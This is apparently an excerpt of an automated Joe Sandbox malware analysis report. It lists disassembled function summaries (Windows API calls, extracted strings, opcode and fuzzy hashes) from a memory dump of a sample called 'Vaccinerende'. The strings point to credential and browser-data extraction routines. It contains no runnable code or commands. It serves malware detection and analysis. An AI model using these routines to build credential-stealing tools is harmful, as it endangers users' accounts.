                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                              • API String ID: 4054529287-3175352466
                                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                              • API String ID: 3143752011-1996832678
                                                                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                              • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                              • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                              • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                              • API String ID: 667068680-2887671607
                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                              • API String ID: 1607361635-601624466
                                                                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                              • API String ID: 2000436516-3842416460
                                                                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                              APIs
                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                              • String ID:
                                                                              • API String ID: 1043902810-0
                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                              APIs
                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                              • free.MSVCRT ref: 0040E49A
                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • memset.MSVCRT ref: 0040E380
                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                              • API String ID: 3849927982-2252543386
                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                              APIs
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                              • API String ID: 2899246560-1542517562
                                                                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004091E2
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                              • memcmp.MSVCRT ref: 004092D9
                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                              • memcmp.MSVCRT ref: 0040933B
                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                              • memcmp.MSVCRT ref: 00409411
                                                                              • memcmp.MSVCRT ref: 00409429
                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                              • memcmp.MSVCRT ref: 004094AC
                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                              • String ID:
                                                                              • API String ID: 3715365532-3916222277
                                                                              • Opcode ID: 683302bc83f0c3b8efe37202e36ecfb2c28a75702c8a880ee355ae88e17874fd
                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                              • Opcode Fuzzy Hash: 683302bc83f0c3b8efe37202e36ecfb2c28a75702c8a880ee355ae88e17874fd
                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                              • API String ID: 3330709923-517860148
                                                                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                              APIs
                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                              • memset.MSVCRT ref: 0040806A
                                                                              • memset.MSVCRT ref: 0040807F
                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                              • memset.MSVCRT ref: 004081E4
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                              • String ID: logins$null
                                                                              • API String ID: 2148543256-2163367763
                                                                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              • memset.MSVCRT ref: 004085CF
                                                                              • memset.MSVCRT ref: 004085F1
                                                                              • memset.MSVCRT ref: 00408606
                                                                              • strcmp.MSVCRT ref: 00408645
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                              • memset.MSVCRT ref: 0040870E
                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                              • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                              • String ID: ---
                                                                              • API String ID: 3437578500-2854292027
                                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0041087D
                                                                              • memset.MSVCRT ref: 00410892
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                              • String ID:
                                                                              • API String ID: 1010922700-0
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
APIs
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
